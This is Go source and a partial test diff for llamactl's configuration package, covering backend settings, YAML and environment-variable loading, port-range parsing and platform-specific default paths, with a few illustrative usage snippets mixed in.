type DockerSettings struct {
Enabled bool `yaml:"enabled"`
Image string `yaml:"image"`
Args []string `yaml:"args"`
Environment map[string]string `yaml:"environment,omitempty"`
}
// BackendConfig contains backend executable configurations
type BackendConfig struct {
LlamaCpp BackendSettings `yaml:"llama-cpp"`
VLLM BackendSettings `yaml:"vllm"`
MLX BackendSettings `yaml:"mlx"`
}
// AppConfig represents the configuration for llamactl
type AppConfig struct {
Server ServerConfig `yaml:"server"`
Backends BackendConfig `yaml:"backends"`
Instances InstancesConfig `yaml:"instances"`
Auth AuthConfig `yaml:"auth"`
Version string `yaml:"-"`
CommitHash string `yaml:"-"`
BuildTime string `yaml:"-"`
}
// ServerConfig contains HTTP server configuration
type ServerConfig struct {
// Server host to bind to
Host string `yaml:"host"`
// Server port to bind to
Port int `yaml:"port"`
// Allowed origins for CORS (e.g., "http://localhost:3000")
AllowedOrigins []string `yaml:"allowed_origins"`
// Enable Swagger UI for API documentation
EnableSwagger bool `yaml:"enable_swagger"`
}
// InstancesConfig contains instance management configuration
type InstancesConfig struct {
// Port range for instances (e.g., 8000,9000)
PortRange [2]int `yaml:"port_range"`
// Directory where all llamactl data will be stored (instances.json, logs, etc.)
DataDir string `yaml:"data_dir"`
// Instance config directory override
InstancesDir string `yaml:"configs_dir"`
// Logs directory override
LogsDir string `yaml:"logs_dir"`
// Automatically create the data directory if it doesn't exist
AutoCreateDirs bool `yaml:"auto_create_dirs"`
// Maximum number of instances that can be created
MaxInstances int `yaml:"max_instances"`
// Maximum number of instances that can be running at the same time
MaxRunningInstances int `yaml:"max_running_instances,omitempty"`
// Enable LRU eviction for instance logs
EnableLRUEviction bool `yaml:"enable_lru_eviction"`
// Default auto-restart setting for new instances
DefaultAutoRestart bool `yaml:"default_auto_restart"`
// Default max restarts for new instances
DefaultMaxRestarts int `yaml:"default_max_restarts"`
// Default restart delay for new instances (in seconds)
DefaultRestartDelay int `yaml:"default_restart_delay"`
// Default on-demand start setting for new instances
DefaultOnDemandStart bool `yaml:"default_on_demand_start"`
// How long to wait for an instance to start on demand (in seconds)
OnDemandStartTimeout int `yaml:"on_demand_start_timeout,omitempty"`
// Interval for checking instance timeouts (in minutes)
TimeoutCheckInterval int `yaml:"timeout_check_interval"`
}
// AuthConfig contains authentication settings
type AuthConfig struct {
// Require authentication for OpenAI compatible inference endpoints
RequireInferenceAuth bool `yaml:"require_inference_auth"`
// List of keys for OpenAI compatible inference endpoints
InferenceKeys []string `yaml:"inference_keys"`
// Require authentication for management endpoints
RequireManagementAuth bool `yaml:"require_management_auth"`
// List of keys for management endpoints
ManagementKeys []string `yaml:"management_keys"`
}
// LoadConfig loads configuration with the following precedence:
// 1. Hardcoded defaults
// 2. Config file
// 3. Environment variables
func LoadConfig(configPath string) (AppConfig, error) {
// 1. Start with defaults
cfg := AppConfig{
Server: ServerConfig{
Host: "0.0.0.0",
Port: 8080,
AllowedOrigins: []string{"*"}, // Default to allow all origins
EnableSwagger: false,
},
Backends: BackendConfig{
LlamaCpp: BackendSettings{
Command: "llama-server",
Args: []string{},
Environment: map[string]string{},
Docker: &DockerSettings{
Enabled: false,
Image: "ghcr.io/ggml-org/llama.cpp:server",
Args: []string{
"run", "--rm", "--network", "host", "--gpus", "all",
"-v", filepath.Join(getDefaultDataDirectory(), "llama.cpp") + ":/root/.cache/llama.cpp"},
Environment: map[string]string{},
},
},
VLLM: BackendSettings{
Command: "vllm",
Args: []string{"serve"},
Docker: &DockerSettings{
Enabled: false,
Image: "vllm/vllm-openai:latest",
Args: []string{
"run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g",
"-v", filepath.Join(getDefaultDataDirectory(), "huggingface") + ":/root/.cache/huggingface",
},
Environment: map[string]string{},
},
},
MLX: BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
// No Docker section for MLX - not supported
},
},
Instances: InstancesConfig{
PortRange: [2]int{8000, 9000},
DataDir: getDefaultDataDirectory(),
// NOTE: InstancesDir and LogsDir are left empty as placeholders; when not explicitly set,
// they default to paths under DataDir (see below).
InstancesDir: "",
LogsDir: "",
AutoCreateDirs: true,
MaxInstances: -1, // -1 means unlimited
MaxRunningInstances: -1, // -1 means unlimited
EnableLRUEviction: true,
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
DefaultOnDemandStart: true,
OnDemandStartTimeout: 120, // 2 minutes
TimeoutCheckInterval: 5, // Check timeouts every 5 minutes
},
Auth: AuthConfig{
RequireInferenceAuth: true,
InferenceKeys: []string{},
RequireManagementAuth: true,
ManagementKeys: []string{},
},
}
// 2. Load from config file
if err := loadConfigFile(&cfg, configPath); err != nil {
return cfg, err
}
// 3. Override with environment variables
loadEnvVars(&cfg)
// If InstancesDir or LogsDir is not set, default them to paths under DataDir
if cfg.Instances.InstancesDir == "" {
cfg.Instances.InstancesDir = filepath.Join(cfg.Instances.DataDir, "instances")
}
if cfg.Instances.LogsDir == "" {
cfg.Instances.LogsDir = filepath.Join(cfg.Instances.DataDir, "logs")
}
return cfg, nil
}
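
For reference, a hypothetical YAML fragment matching the structures above (the values are invented; it is unmarshalled directly here rather than through LoadConfig just to show the shape of the yaml tags):

package main

import (
    "fmt"

    "llamactl/pkg/config"
    "gopkg.in/yaml.v3"
)

func main() {
    raw := `
backends:
  vllm:
    command: vllm
    args: ["serve"]
    environment:
      CUDA_VISIBLE_DEVICES: "0"
    docker:
      enabled: true
      image: vllm/vllm-openai:latest
instances:
  port_range: [8100, 8200]
  max_instances: 4
`
    var cfg config.AppConfig
    if err := yaml.Unmarshal([]byte(raw), &cfg); err != nil {
        panic(err)
    }
    // Prints: true [8100 8200] 4
    fmt.Println(cfg.Backends.VLLM.Docker.Enabled, cfg.Instances.PortRange, cfg.Instances.MaxInstances)
}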
// loadConfigFile attempts to load config from file with fallback locations
func loadConfigFile(cfg *AppConfig, configPath string) error {
var configLocations []string
// If specific config path provided, use only that
if configPath != "" {
configLocations = []string{configPath}
} else {
// Default config file locations (in order of precedence)
configLocations = getDefaultConfigLocations()
}
for _, path := range configLocations {
if data, err := os.ReadFile(path); err == nil {
if err := yaml.Unmarshal(data, cfg); err != nil {
return err
}
log.Printf("Read config at %s", path)
return nil
}
}
return nil
}
// loadEnvVars overrides config with environment variables
func loadEnvVars(cfg *AppConfig) {
// Server config
if host := os.Getenv("LLAMACTL_HOST"); host != "" {
cfg.Server.Host = host
}
if port := os.Getenv("LLAMACTL_PORT"); port != "" {
if p, err := strconv.Atoi(port); err == nil {
cfg.Server.Port = p
}
}
if allowedOrigins := os.Getenv("LLAMACTL_ALLOWED_ORIGINS"); allowedOrigins != "" {
cfg.Server.AllowedOrigins = strings.Split(allowedOrigins, ",")
}
if enableSwagger := os.Getenv("LLAMACTL_ENABLE_SWAGGER"); enableSwagger != "" {
if b, err := strconv.ParseBool(enableSwagger); err == nil {
cfg.Server.EnableSwagger = b
}
}
// Data config
if dataDir := os.Getenv("LLAMACTL_DATA_DIRECTORY"); dataDir != "" {
cfg.Instances.DataDir = dataDir
}
if instancesDir := os.Getenv("LLAMACTL_INSTANCES_DIR"); instancesDir != "" {
cfg.Instances.InstancesDir = instancesDir
}
if logsDir := os.Getenv("LLAMACTL_LOGS_DIR"); logsDir != "" {
cfg.Instances.LogsDir = logsDir
}
if autoCreate := os.Getenv("LLAMACTL_AUTO_CREATE_DATA_DIR"); autoCreate != "" {
if b, err := strconv.ParseBool(autoCreate); err == nil {
cfg.Instances.AutoCreateDirs = b
}
}
// Instance config
if portRange := os.Getenv("LLAMACTL_INSTANCE_PORT_RANGE"); portRange != "" {
if ports := ParsePortRange(portRange); ports != [2]int{0, 0} {
cfg.Instances.PortRange = ports
}
}
if maxInstances := os.Getenv("LLAMACTL_MAX_INSTANCES"); maxInstances != "" {
if m, err := strconv.Atoi(maxInstances); err == nil {
cfg.Instances.MaxInstances = m
}
}
if maxRunning := os.Getenv("LLAMACTL_MAX_RUNNING_INSTANCES"); maxRunning != "" {
if m, err := strconv.Atoi(maxRunning); err == nil {
cfg.Instances.MaxRunningInstances = m
}
}
if enableLRUEviction := os.Getenv("LLAMACTL_ENABLE_LRU_EVICTION"); enableLRUEviction != "" {
if b, err := strconv.ParseBool(enableLRUEviction); err == nil {
cfg.Instances.EnableLRUEviction = b
}
}
// Backend config
// LlamaCpp backend
if llamaCmd := os.Getenv("LLAMACTL_LLAMACPP_COMMAND"); llamaCmd != "" {
cfg.Backends.LlamaCpp.Command = llamaCmd
}
if llamaArgs := os.Getenv("LLAMACTL_LLAMACPP_ARGS"); llamaArgs != "" {
cfg.Backends.LlamaCpp.Args = strings.Split(llamaArgs, " ")
}
if llamaEnv := os.Getenv("LLAMACTL_LLAMACPP_ENV"); llamaEnv != "" {
if cfg.Backends.LlamaCpp.Environment == nil {
cfg.Backends.LlamaCpp.Environment = make(map[string]string)
}
parseEnvVars(llamaEnv, cfg.Backends.LlamaCpp.Environment)
}
if llamaDockerEnabled := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_ENABLED"); llamaDockerEnabled != "" {
if b, err := strconv.ParseBool(llamaDockerEnabled); err == nil {
if cfg.Backends.LlamaCpp.Docker == nil {
cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
}
cfg.Backends.LlamaCpp.Docker.Enabled = b
}
}
if llamaDockerImage := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_IMAGE"); llamaDockerImage != "" {
if cfg.Backends.LlamaCpp.Docker == nil {
cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
}
cfg.Backends.LlamaCpp.Docker.Image = llamaDockerImage
}
if llamaDockerArgs := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_ARGS"); llamaDockerArgs != "" {
if cfg.Backends.LlamaCpp.Docker == nil {
cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
}
cfg.Backends.LlamaCpp.Docker.Args = strings.Split(llamaDockerArgs, " ")
}
if llamaDockerEnv := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_ENV"); llamaDockerEnv != "" {
if cfg.Backends.LlamaCpp.Docker == nil {
cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
}
if cfg.Backends.LlamaCpp.Docker.Environment == nil {
cfg.Backends.LlamaCpp.Docker.Environment = make(map[string]string)
}
parseEnvVars(llamaDockerEnv, cfg.Backends.LlamaCpp.Docker.Environment)
}
// vLLM backend
if vllmCmd := os.Getenv("LLAMACTL_VLLM_COMMAND"); vllmCmd != "" {
cfg.Backends.VLLM.Command = vllmCmd
}
if vllmArgs := os.Getenv("LLAMACTL_VLLM_ARGS"); vllmArgs != "" {
cfg.Backends.VLLM.Args = strings.Split(vllmArgs, " ")
}
if vllmEnv := os.Getenv("LLAMACTL_VLLM_ENV"); vllmEnv != "" {
if cfg.Backends.VLLM.Environment == nil {
cfg.Backends.VLLM.Environment = make(map[string]string)
}
parseEnvVars(vllmEnv, cfg.Backends.VLLM.Environment)
}
if vllmDockerEnabled := os.Getenv("LLAMACTL_VLLM_DOCKER_ENABLED"); vllmDockerEnabled != "" {
if b, err := strconv.ParseBool(vllmDockerEnabled); err == nil {
if cfg.Backends.VLLM.Docker == nil {
cfg.Backends.VLLM.Docker = &DockerSettings{}
}
cfg.Backends.VLLM.Docker.Enabled = b
}
}
if vllmDockerImage := os.Getenv("LLAMACTL_VLLM_DOCKER_IMAGE"); vllmDockerImage != "" {
if cfg.Backends.VLLM.Docker == nil {
cfg.Backends.VLLM.Docker = &DockerSettings{}
}
cfg.Backends.VLLM.Docker.Image = vllmDockerImage
}
if vllmDockerArgs := os.Getenv("LLAMACTL_VLLM_DOCKER_ARGS"); vllmDockerArgs != "" {
if cfg.Backends.VLLM.Docker == nil {
cfg.Backends.VLLM.Docker = &DockerSettings{}
}
cfg.Backends.VLLM.Docker.Args = strings.Split(vllmDockerArgs, " ")
}
if vllmDockerEnv := os.Getenv("LLAMACTL_VLLM_DOCKER_ENV"); vllmDockerEnv != "" {
if cfg.Backends.VLLM.Docker == nil {
cfg.Backends.VLLM.Docker = &DockerSettings{}
}
if cfg.Backends.VLLM.Docker.Environment == nil {
cfg.Backends.VLLM.Docker.Environment = make(map[string]string)
}
parseEnvVars(vllmDockerEnv, cfg.Backends.VLLM.Docker.Environment)
}
// MLX backend
if mlxCmd := os.Getenv("LLAMACTL_MLX_COMMAND"); mlxCmd != "" {
cfg.Backends.MLX.Command = mlxCmd
}
if mlxArgs := os.Getenv("LLAMACTL_MLX_ARGS"); mlxArgs != "" {
cfg.Backends.MLX.Args = strings.Split(mlxArgs, " ")
}
if mlxEnv := os.Getenv("LLAMACTL_MLX_ENV"); mlxEnv != "" {
if cfg.Backends.MLX.Environment == nil {
cfg.Backends.MLX.Environment = make(map[string]string)
}
parseEnvVars(mlxEnv, cfg.Backends.MLX.Environment)
}
// Instance defaults
if autoRestart := os.Getenv("LLAMACTL_DEFAULT_AUTO_RESTART"); autoRestart != "" {
if b, err := strconv.ParseBool(autoRestart); err == nil {
cfg.Instances.DefaultAutoRestart = b
}
}
if maxRestarts := os.Getenv("LLAMACTL_DEFAULT_MAX_RESTARTS"); maxRestarts != "" {
if m, err := strconv.Atoi(maxRestarts); err == nil {
cfg.Instances.DefaultMaxRestarts = m
}
}
if restartDelay := os.Getenv("LLAMACTL_DEFAULT_RESTART_DELAY"); restartDelay != "" {
if seconds, err := strconv.Atoi(restartDelay); err == nil {
cfg.Instances.DefaultRestartDelay = seconds
}
}
if onDemandStart := os.Getenv("LLAMACTL_DEFAULT_ON_DEMAND_START"); onDemandStart != "" {
if b, err := strconv.ParseBool(onDemandStart); err == nil {
cfg.Instances.DefaultOnDemandStart = b
}
}
if onDemandTimeout := os.Getenv("LLAMACTL_ON_DEMAND_START_TIMEOUT"); onDemandTimeout != "" {
if seconds, err := strconv.Atoi(onDemandTimeout); err == nil {
cfg.Instances.OnDemandStartTimeout = seconds
}
}
if timeoutCheckInterval := os.Getenv("LLAMACTL_TIMEOUT_CHECK_INTERVAL"); timeoutCheckInterval != "" {
if minutes, err := strconv.Atoi(timeoutCheckInterval); err == nil {
cfg.Instances.TimeoutCheckInterval = minutes
}
}
// Auth config
if requireInferenceAuth := os.Getenv("LLAMACTL_REQUIRE_INFERENCE_AUTH"); requireInferenceAuth != "" {
if b, err := strconv.ParseBool(requireInferenceAuth); err == nil {
cfg.Auth.RequireInferenceAuth = b
}
}
if inferenceKeys := os.Getenv("LLAMACTL_INFERENCE_KEYS"); inferenceKeys != "" {
cfg.Auth.InferenceKeys = strings.Split(inferenceKeys, ",")
}
if requireManagementAuth := os.Getenv("LLAMACTL_REQUIRE_MANAGEMENT_AUTH"); requireManagementAuth != "" {
if b, err := strconv.ParseBool(requireManagementAuth); err == nil {
cfg.Auth.RequireManagementAuth = b
}
}
if managementKeys := os.Getenv("LLAMACTL_MANAGEMENT_KEYS"); managementKeys != "" {
cfg.Auth.ManagementKeys = strings.Split(managementKeys, ",")
}
}
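// Illustrative sketch (not part of the original source): because LoadConfig
// applies the overrides above after reading any YAML file, a deployment can
// be configured purely through the environment. The values below are
// hypothetical.
func exampleEnvironmentOverrides() {
    os.Setenv("LLAMACTL_VLLM_DOCKER_ENABLED", "true")
    os.Setenv("LLAMACTL_VLLM_DOCKER_ENV", "CUDA_VISIBLE_DEVICES=1,HF_HOME=/models/cache")
    defer os.Unsetenv("LLAMACTL_VLLM_DOCKER_ENABLED")
    defer os.Unsetenv("LLAMACTL_VLLM_DOCKER_ENV")

    cfg, err := LoadConfig("nonexistent-file.yaml")
    if err == nil {
        // cfg.Backends.VLLM.Docker.Enabled == true
        // cfg.Backends.VLLM.Docker.Environment["HF_HOME"] == "/models/cache"
        _ = cfg
    }
}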
// ParsePortRange parses port range from string formats like "8000-9000" or "8000,9000"
func ParsePortRange(s string) [2]int {
var parts []string
// Try both separators
if strings.Contains(s, "-") {
parts = strings.Split(s, "-")
} else if strings.Contains(s, ",") {
parts = strings.Split(s, ",")
}
// Parse the two parts
if len(parts) == 2 {
start, err1 := strconv.Atoi(strings.TrimSpace(parts[0]))
end, err2 := strconv.Atoi(strings.TrimSpace(parts[1]))
if err1 == nil && err2 == nil {
return [2]int{start, end}
}
}
return [2]int{0, 0} // Invalid format
}
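// Illustrative sketch (not part of the original source): both separators are
// accepted and whitespace around the numbers is trimmed; anything else
// collapses to the zero value.
func exampleParsePortRange() {
    _ = ParsePortRange("8000-9000")  // [2]int{8000, 9000}
    _ = ParsePortRange("8000, 9000") // [2]int{8000, 9000}
    _ = ParsePortRange("not-ports")  // [2]int{0, 0}
}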
// parseEnvVars parses environment variables in format "KEY1=value1,KEY2=value2"
// and populates the provided environment map
func parseEnvVars(envString string, envMap map[string]string) {
if envString == "" {
return
}
for _, envPair := range strings.Split(envString, ",") {
if parts := strings.SplitN(strings.TrimSpace(envPair), "=", 2); len(parts) == 2 {
envMap[parts[0]] = parts[1]
}
}
}
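// Illustrative sketch (not part of the original source): pairs are split on
// commas and only the first '=' separates key from value, so values may
// contain ':' or further '=' characters; a pair without '=' is ignored.
func exampleParseEnvVars() map[string]string {
    env := make(map[string]string)
    parseEnvVars("CUDA_VISIBLE_DEVICES=0,PYTORCH_CUDA_ALLOC_CONF=max_split_size_mb:512,MALFORMED", env)
    // env == map[string]string{
    //   "CUDA_VISIBLE_DEVICES":    "0",
    //   "PYTORCH_CUDA_ALLOC_CONF": "max_split_size_mb:512",
    // }
    return env
}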
// getDefaultDataDirectory returns platform-specific default data directory
func getDefaultDataDirectory() string {
switch runtime.GOOS {
case "windows":
// Try PROGRAMDATA first (system-wide), fallback to LOCALAPPDATA (user)
if programData := os.Getenv("PROGRAMDATA"); programData != "" {
return filepath.Join(programData, "llamactl")
}
if localAppData := os.Getenv("LOCALAPPDATA"); localAppData != "" {
return filepath.Join(localAppData, "llamactl")
}
return "C:\\ProgramData\\llamactl" // Final fallback
case "darwin":
// For macOS, use user's Application Support directory
if homeDir, _ := os.UserHomeDir(); homeDir != "" {
return filepath.Join(homeDir, "Library", "Application Support", "llamactl")
}
return "/usr/local/var/llamactl" // Fallback
default:
// Linux and other Unix-like systems
if homeDir, _ := os.UserHomeDir(); homeDir != "" {
return filepath.Join(homeDir, ".local", "share", "llamactl")
}
return "/var/lib/llamactl" // Final fallback
}
}
// getDefaultConfigLocations returns platform-specific config file locations
func getDefaultConfigLocations() []string {
var locations []string
// Check ./llamactl.yaml and ./config.yaml in the current directory first
locations = append(locations, "llamactl.yaml")
locations = append(locations, "config.yaml")
homeDir, _ := os.UserHomeDir()
switch runtime.GOOS {
case "windows":
// Windows: Use APPDATA if available, else user home, fallback to ProgramData
if appData := os.Getenv("APPDATA"); appData != "" {
locations = append(locations, filepath.Join(appData, "llamactl", "config.yaml"))
} else if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, "llamactl", "config.yaml"))
}
locations = append(locations, filepath.Join(os.Getenv("PROGRAMDATA"), "llamactl", "config.yaml"))
case "darwin":
// macOS: Use Application Support in user home, fallback to /Library/Application Support
if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"))
}
locations = append(locations, "/Library/Application Support/llamactl/config.yaml")
default:
// Linux/Unix: Use ~/.config/llamactl/config.yaml, fallback to /etc/llamactl/config.yaml
if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, ".config", "llamactl", "config.yaml"))
}
locations = append(locations, "/etc/llamactl/config.yaml")
}
return locations
}
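// Illustrative note (not part of the original source): on Linux the resulting
// search order is
//
//	llamactl.yaml                    (current directory)
//	config.yaml                      (current directory)
//	~/.config/llamactl/config.yaml
//	/etc/llamactl/config.yaml
//
// assuming the caller probes the returned locations in order.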
// GetBackendSettings resolves the settings for the given backend type
func (bc *BackendConfig) GetBackendSettings(backendType string) BackendSettings {
switch backendType {
case "llama-cpp":
return bc.LlamaCpp
case "vllm":
return bc.VLLM
case "mlx":
return bc.MLX
default:
return BackendSettings{}
}
}
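// Illustrative sketch (not part of the original source): resolving the
// settings for each supported backend; an unrecognized type yields an empty
// BackendSettings value.
func exampleGetBackendSettings(bc *BackendConfig) {
    llama := bc.GetBackendSettings("llama-cpp") // bc.LlamaCpp
    vllm := bc.GetBackendSettings("vllm")       // bc.VLLM
    mlx := bc.GetBackendSettings("mlx")         // bc.MLX
    other := bc.GetBackendSettings("unknown")   // BackendSettings{}
    _, _, _, _ = llama, vllm, mlx, other
}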

View File

@@ -1,16 +1,15 @@
package llamactl_test
package config_test
import (
"llamactl/pkg/config"
"os"
"path/filepath"
"testing"
llamactl "llamactl/pkg"
)
func TestLoadConfig_Defaults(t *testing.T) {
// Test loading config when no file exists and no env vars set
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig should not error with defaults: %v", err)
}
@@ -22,18 +21,27 @@ func TestLoadConfig_Defaults(t *testing.T) {
if cfg.Server.Port != 8080 {
t.Errorf("Expected default port to be 8080, got %d", cfg.Server.Port)
}
homedir, err := os.UserHomeDir()
if err != nil {
t.Fatalf("Failed to get user home directory: %v", err)
}
if cfg.Instances.InstancesDir != filepath.Join(homedir, ".local", "share", "llamactl", "instances") {
t.Errorf("Expected default instances directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "instances"), cfg.Instances.InstancesDir)
}
if cfg.Instances.LogsDir != filepath.Join(homedir, ".local", "share", "llamactl", "logs") {
t.Errorf("Expected default logs directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "logs"), cfg.Instances.LogsDir)
}
if !cfg.Instances.AutoCreateDirs {
t.Error("Expected default instances auto-create to be true")
}
if cfg.Instances.PortRange != [2]int{8000, 9000} {
t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange)
}
if cfg.Instances.LogDirectory != "/tmp/llamactl" {
t.Errorf("Expected default log directory '/tmp/llamactl', got %q", cfg.Instances.LogDirectory)
}
if cfg.Instances.MaxInstances != -1 {
t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
}
if cfg.Instances.LlamaExecutable != "llama-server" {
t.Errorf("Expected default executable 'llama-server', got %q", cfg.Instances.LlamaExecutable)
}
if !cfg.Instances.DefaultAutoRestart {
t.Error("Expected default auto restart to be true")
}
@@ -56,7 +64,7 @@ server:
port: 9090
instances:
port_range: [7000, 8000]
log_directory: "/custom/logs"
logs_dir: "/custom/logs"
max_instances: 5
llama_executable: "/usr/bin/llama-server"
default_auto_restart: false
@@ -69,7 +77,7 @@ instances:
t.Fatalf("Failed to write test config file: %v", err)
}
cfg, err := llamactl.LoadConfig(configFile)
cfg, err := config.LoadConfig(configFile)
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
@@ -84,15 +92,12 @@ instances:
if cfg.Instances.PortRange != [2]int{7000, 8000} {
t.Errorf("Expected port range [7000, 8000], got %v", cfg.Instances.PortRange)
}
if cfg.Instances.LogDirectory != "/custom/logs" {
t.Errorf("Expected log directory '/custom/logs', got %q", cfg.Instances.LogDirectory)
if cfg.Instances.LogsDir != "/custom/logs" {
t.Errorf("Expected logs directory '/custom/logs', got %q", cfg.Instances.LogsDir)
}
if cfg.Instances.MaxInstances != 5 {
t.Errorf("Expected max instances 5, got %d", cfg.Instances.MaxInstances)
}
if cfg.Instances.LlamaExecutable != "/usr/bin/llama-server" {
t.Errorf("Expected executable '/usr/bin/llama-server', got %q", cfg.Instances.LlamaExecutable)
}
if cfg.Instances.DefaultAutoRestart {
t.Error("Expected auto restart to be false")
}
@@ -110,9 +115,8 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
"LLAMACTL_HOST": "0.0.0.0",
"LLAMACTL_PORT": "3000",
"LLAMACTL_INSTANCE_PORT_RANGE": "5000-6000",
"LLAMACTL_LOG_DIR": "/env/logs",
"LLAMACTL_LOGS_DIR": "/env/logs",
"LLAMACTL_MAX_INSTANCES": "20",
"LLAMACTL_LLAMA_EXECUTABLE": "/env/llama-server",
"LLAMACTL_DEFAULT_AUTO_RESTART": "false",
"LLAMACTL_DEFAULT_MAX_RESTARTS": "7",
"LLAMACTL_DEFAULT_RESTART_DELAY": "15",
@@ -124,7 +128,7 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
defer os.Unsetenv(key)
}
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
@@ -139,14 +143,14 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
if cfg.Instances.PortRange != [2]int{5000, 6000} {
t.Errorf("Expected port range [5000, 6000], got %v", cfg.Instances.PortRange)
}
if cfg.Instances.LogDirectory != "/env/logs" {
t.Errorf("Expected log directory '/env/logs', got %q", cfg.Instances.LogDirectory)
if cfg.Instances.LogsDir != "/env/logs" {
t.Errorf("Expected logs directory '/env/logs', got %q", cfg.Instances.LogsDir)
}
if cfg.Instances.MaxInstances != 20 {
t.Errorf("Expected max instances 20, got %d", cfg.Instances.MaxInstances)
}
if cfg.Instances.LlamaExecutable != "/env/llama-server" {
t.Errorf("Expected executable '/env/llama-server', got %q", cfg.Instances.LlamaExecutable)
if cfg.Backends.LlamaCpp.Command != "llama-server" {
t.Errorf("Expected default llama command 'llama-server', got %q", cfg.Backends.LlamaCpp.Command)
}
if cfg.Instances.DefaultAutoRestart {
t.Error("Expected auto restart to be false")
@@ -183,7 +187,7 @@ instances:
defer os.Unsetenv("LLAMACTL_HOST")
defer os.Unsetenv("LLAMACTL_MAX_INSTANCES")
cfg, err := llamactl.LoadConfig(configFile)
cfg, err := config.LoadConfig(configFile)
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
@@ -219,7 +223,7 @@ instances:
t.Fatalf("Failed to write test config file: %v", err)
}
_, err = llamactl.LoadConfig(configFile)
_, err = config.LoadConfig(configFile)
if err == nil {
t.Error("Expected LoadConfig to return error for invalid YAML")
}
@@ -245,7 +249,7 @@ func TestParsePortRange(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result := llamactl.ParsePortRange(tt.input)
result := config.ParsePortRange(tt.input)
if result != tt.expected {
t.Errorf("ParsePortRange(%q) = %v, expected %v", tt.input, result, tt.expected)
}
@@ -260,31 +264,31 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
testCases := []struct {
envVar string
envValue string
checkFn func(*llamactl.Config) bool
checkFn func(*config.AppConfig) bool
desc string
}{
{
envVar: "LLAMACTL_PORT",
envValue: "invalid-port",
checkFn: func(c *llamactl.Config) bool { return c.Server.Port == 8080 }, // Should keep default
checkFn: func(c *config.AppConfig) bool { return c.Server.Port == 8080 }, // Should keep default
desc: "invalid port number should keep default",
},
{
envVar: "LLAMACTL_MAX_INSTANCES",
envValue: "not-a-number",
checkFn: func(c *llamactl.Config) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
checkFn: func(c *config.AppConfig) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
desc: "invalid max instances should keep default",
},
{
envVar: "LLAMACTL_DEFAULT_AUTO_RESTART",
envValue: "invalid-bool",
checkFn: func(c *llamactl.Config) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
checkFn: func(c *config.AppConfig) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
desc: "invalid boolean should keep default",
},
{
envVar: "LLAMACTL_INSTANCE_PORT_RANGE",
envValue: "invalid-range",
checkFn: func(c *llamactl.Config) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
checkFn: func(c *config.AppConfig) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
desc: "invalid port range should keep default",
},
}
@@ -294,7 +298,7 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
os.Setenv(tc.envVar, tc.envValue)
defer os.Unsetenv(tc.envVar)
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
@@ -323,7 +327,7 @@ server:
t.Fatalf("Failed to write test config file: %v", err)
}
cfg, err := llamactl.LoadConfig(configFile)
cfg, err := config.LoadConfig(configFile)
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
@@ -344,3 +348,165 @@ server:
t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
}
}
func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
bc := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "custom-llama",
Args: []string{"--verbose"},
Docker: &config.DockerSettings{
Enabled: true,
Image: "custom-llama:latest",
Args: []string{"--gpus", "all"},
Environment: map[string]string{"CUDA_VISIBLE_DEVICES": "1"},
},
},
VLLM: config.BackendSettings{
Command: "custom-vllm",
Args: []string{"serve", "--debug"},
},
MLX: config.BackendSettings{
Command: "custom-mlx",
Args: []string{},
},
}
// Test llama-cpp with Docker
settings := bc.GetBackendSettings("llama-cpp")
if settings.Command != "custom-llama" {
t.Errorf("Expected command 'custom-llama', got %q", settings.Command)
}
if len(settings.Args) != 1 || settings.Args[0] != "--verbose" {
t.Errorf("Expected args ['--verbose'], got %v", settings.Args)
}
if settings.Docker == nil || !settings.Docker.Enabled {
t.Error("Expected Docker to be enabled")
}
if settings.Docker.Image != "custom-llama:latest" {
t.Errorf("Expected Docker image 'custom-llama:latest', got %q", settings.Docker.Image)
}
// Test vLLM without Docker
settings = bc.GetBackendSettings("vllm")
if settings.Command != "custom-vllm" {
t.Errorf("Expected command 'custom-vllm', got %q", settings.Command)
}
if len(settings.Args) != 2 || settings.Args[0] != "serve" || settings.Args[1] != "--debug" {
